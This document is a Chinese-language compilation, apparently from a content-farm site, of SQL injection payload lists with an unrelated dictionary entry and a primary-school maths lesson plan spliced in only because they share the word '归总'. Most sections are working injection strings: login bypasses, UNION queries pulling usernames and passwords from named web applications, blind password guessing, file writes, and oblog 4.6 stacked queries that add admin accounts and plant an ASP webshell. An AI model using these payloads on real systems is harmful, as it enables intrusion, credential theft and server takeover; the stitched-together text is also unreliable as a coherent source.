下面是小编为大家整理的经典的注入语句归总,本文共7篇,仅供大家参考借鉴,希望大家喜欢,并能积极分享!
篇1:经典的注入语句归总
注入经典语句总结
' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………依次类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database,version() (灵活应用查询)
常用查询测试语句,
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 12
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%)%20order%20by%20eventdate
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%)%20order%20by%20eventdate
构造语句:
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
UNION%20(SELECT%201,0,2,'-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate (查沙子的id)
(SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……(字段和数据库相同情况下,可直接提交)
SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
“___”
“.__ ”
“%
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
$command = “dir c:”;system($command);
SELECT * FROM article WHERE articleid='$id'
SELECT * FROM article WHERE articleid=$id
1' and 1=2 union select * from user where userid=1/* 句中变为
(SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*')
1 and 1=2 union select * from user where userid=1
语句形式:建立一个库,插入:
CREATE DATABASE `injection`
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) ;
INSERT INTO `user` VALUES (1, 'swap', 'mypass');
插如一个注册用户:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
“INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')“;
INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
”INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'“;
INSERT INTO membres SET login='',password='',nom='',userlevel='3',email=''
”INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')“;
UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
”UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'“;
UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]'
”UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'“;
长用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
UPDATE article SET title=$title WHERE articleid=1 对应函数
UPDATE article SET title=DATABASE() WHERE id=1
#把当前数据库名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::
$req = ”SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name“;
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' (经典)
SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''
SELECT * FROM table WHERE msg LIKE '%hop'
SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
篇2:归总
归总
归总guī zǒng[释义]①(动)把分散的归并到一处。~群众意见。(作谓语)
②(副)总共。~就是这些意见。(作状语)
[构成] 偏正式:归〔总篇3:SQL注入语句
ID=1458%20and%20@@version%3D0 判断版本
ID=1458%20and%20db_name%28%29%3D0 数据库名
ID=1458%20and%20@@servername%3D0 服务器名
ID=1458%20and%20system_user%3D0 系统用户名
D=1458%20and%20user%3D0 权限/DBO OR PUBLIC
ID=1458%20and%20quotename%28is_srvrolemember%280x730079007300610064006D0069006E00%29%29%3D0 是否sysadmin,1是0否
ID=1458%20and%20quotename%28db_name%281%29%29%3D0 判断数据库
ID=1458%20and%20quotename%28db_name%282%29%29%3D0
ID=1458%20and%20quotename%28db_name%283%29%29%3D0
ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2032%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0
ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2033%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0
解密之后就是:
ID=1458 and (select top 1 quotename(name) from Digicom.dbo.sysobjects where type=U AND name not in (select top 33 name from Digicom.dbo.sysobjects where type=U))=0
下面是pangolin的:
/add_item.asp?ID=1458%20and%200<(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([filename]%20as%20nvarchar(4000))%20from(select%20top%20%201%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
得到数据库文件的路径.
篇4:or注入的利用和语句
我记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话,改怎么注入啊?当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法,我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵。
我们来构造测试语句:
Copy code
vpro.asp?id=1 or exists(select * from admin)返回错误页面,说明存在admin表我们来换一个表试试!
Copy code
vpro.asp?id=1 or exists(select * from n0h4ck)说明不存在n0h4ck这个表。
我们继续来,构造语句
Copy code
vpro.asp?id=1 or exists(select admin from admin)返回or 1=1的页面,说明admin表存在admin字段,
电脑资料
Copy code
vpro.asp?id=1 or exists(select padd from admin)返回or 1=2的页面,说明admin表不存在padd字段。
我们现在开始猜测数据了,
Copy code
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”。
我们再来
Copy code
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢?当然是“admin”啦。
我们用left函数确定一下,
Copy code
vpro.asp?id=1 or (select left(admin,5) from admin)='admin'猜测正确,的确是admin,好了,后面的话就不用我说了吧!
篇5:常用的注入语句总结
注入经典语句总结 ' or 1=1 ' or '1=1 '/* '%23 ' and password='mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from
篇6:归总应用题教案设计
教学目标
1.使学生掌握两步应用题(归总)的结构特点和解答方法,能正确迅速地找到中间问题(先求什么).
2.使学生学会列综合算式解答,初步掌握这类应用题的解题规律.
3.训练学生有条理地分析数量关系,培养学生分析、解答应用题的能力.
教学重点
使学生掌握乘、除法应用题的数量关系、结构特征和解答方法.
教学难点
学画线段图,并借助线段图分析题中数量关系.
教学过程
一、联系生活实际,以旧引新.
1.请你根据学过的乘除法数量关系,联系自己的生活实际举例提问.
①单价×数量=总价
②路程÷时间=速度
③工作总量÷工效=工时
学生可能举例:
①一个足球50元,3个足球多少元?
②我家到姥姥家相距大约120千米,坐汽车行了2小时,这辆汽车每小时行多少千米?
③王师傅用小推车为食堂运菜,每小时运80千克,240千克的菜要几小时运完?
2.改编:工人们修一条路,每天修12米,10天修完.________?求什么?(求这条路长多少米?)为什么?如果去掉这个问题,改成“如果每天修15米,几天修完?”应该如何解答呢?
此时,学生可能会答也可能答不出.如果有答对的,请他说说是怎样算的;如果没有,教师提问:要想知道“如果每天修15米,几天修完?”,就要先求出什么?(工作总量)根据哪一数量关系求工作总量?
教师导入:生活中这样的问题还有很多,今天我们就一起来研究这样的问题.
二、尝试探索,学习新知.
1.(1)出示例5:工人们修一条路,每天修12米,10天修完.如果每天修15米,几天修完?
学生们自由读题,理解题意.
教师谈话:通过读题,你想到了那些问题,提出来供同学们思考.
学生可能提出:
题目中已知几个条件,它们各是什么?要求什么问题?线段图应该怎么画?
这道题可以先求什么?(中间问题)为什么?
求出总数量后,再求什么?为什么?
经同学们思考(也可以小组讨论),师生共同解决.
全班重点讨论下面的问题:
a.线段图怎样画?题中什么数量变了,什么没变?
使学生明确:为了清楚地反映数量关系,最好画两条线段,两条线段要同样长,表示同一条路(说明工作总量是固定不变的').
b.要求几天修完,必须先求什么?为什么?
[看图分析:可以从条件出发,已知每天修12米(工效),又知道修了10天(工时),就可以求出这条路全长多少米?(工作总量)还可以从最后的问题出发,要求每天修15米,几天修完?必须知道这条路全长是多少米,题目里没有给工作总量,所以要先求出工作总量.]
共同解题,说出解题方法.
(学生边回答教师边板书: 这条路全长多少米?
12 × 10 = 120(米)
几天修完?
120 ÷ 15 = 8(天)
综合算式: 12 × 10 ÷ 15
⑤请学生说一说怎样检验?
(2)教师提问:如果将第三个条件改成“每天修20米、每天修30米、每天修4 0米”,问题不变,仍求几天修完?应该怎样列式?
12×10÷20=6(天) 12×10÷30=4(天)
12×10÷40=3(天)
(3)教师提问:如果将第三个条件和问题改成“如果要求6天修完,每天应修多少米?”应该怎样解答呢?
订正:这条路长多少米? 12 × 10 = 120(米).
每天应修多少米? 120 ÷ 6 = 20(米).
综合算式:12×10÷6
全班共同订正,说说你的解题思路,每一步算式的含义.
(4)教师提问:再将第三个条件改成“要求5天修完、2天修完”,问题不变,仍求每天应修多少米?怎样列式?
12×10÷5=24(米) 12×10÷2=60(米)
2.对比质疑,归纳概括.
教师提问:比较例5、改编题,它们有什么共同点和不同点?
使学生明确:从应用题的结构上看,前两个条件是相同的,给了单一量和数量,第三个条件和问题不同,正好互相交换了一下.从解题思路上看,根据前两个条件就可以求出总数(工作总量),总数量是固定不变的(题目中一般在第一句话表示出来).不同的是:总数量÷份数=每份数,总数量÷每份数=份数.
教师说明:具有以上特点的应用题叫做归总应用题.(出示课题)
三、巩固练习,发展提高.
1.独立完成下题.
①小华读一本书,每天读12页,6天可以读完.如果每天读9页,几天可以读完?
②小华和小刚读同样一本书,小华每天读12页,6天读完,小刚想8天读完,平均每天要读几页?
订正时说说解题的思路各是什么?
2.填表:
解放军列队出操.填出每行人数或行数.(说说解题思路)
每行人数
12
20
45
行数
15
10
四、课堂小结.
今天学习的是什么?你有什么收获?
五、布置作业.
1.方师傅给食堂运菜.如果用小推车每次运75千克,8次能运完.如果改用平板车运,4次就能运完.平板车每次运多少千克?
2.招待所新来一批客人.每间住2人,需要15间房.如果每间房住3人,需要几间房?
板书:
探究活动
折纸条游戏
活动目的
学生通过手、脑、口多种感官参与认知活动,加深对“归总应用题”的认识;锻炼灵活的思维能力,提高数学素质.
活动准备
学生两人一组,每组准备1张较长的彩条,一张表格.
活动过程
1.规则:两人一组,甲任意将彩条折成2段(或几段),乙测量出一段彩条的长度并记录,接着两人互换任务,乙将彩条折成不同的段数请甲根据第一次的测量结果猜出现在每段彩条的长度并记录,互相检查(计算)猜对为赢;此为一局;每场游戏可定为4局,赢者一局加10分,输者记0分并送对方10分,最后分高者为胜.
2.所填表格如下:
篇7:oblog 4.6 注入的语句
oblog 4.6 注入的语句
s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_syslog/**/where/**/username='duyao';--删除指定用户日志
s'/**/WHERE/**/logid=21949;insert/**/into/**/oblog_admin/**/
(username,password,roleid)values('duyao','00b1d1380814062d',0);-- 添加指定用
户
s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_admin/**/where/**/
username='duyao';-- 删除指定用户
备份获得webshell
s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--
s'/**/WHERE/**/logid=21949;create/**/table/**/cmd/**/(a/**/image);--
s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/
**/'c:\zj1244'/**/with/**/init;--
s'/**/WHERE/**/logid=21949;insert/**/into/**/cmd/**/(a)/**/
values(0x3C256576616C2072657175657374286368722833352929253E);--
s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/
**/'c:\a\a\';--
s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--
s'/**/WHERE/**/logid=21949;s' WHERE logid=1;update oblog_user set
useremail=db_name() where username='duyao';--
文档为doc格式
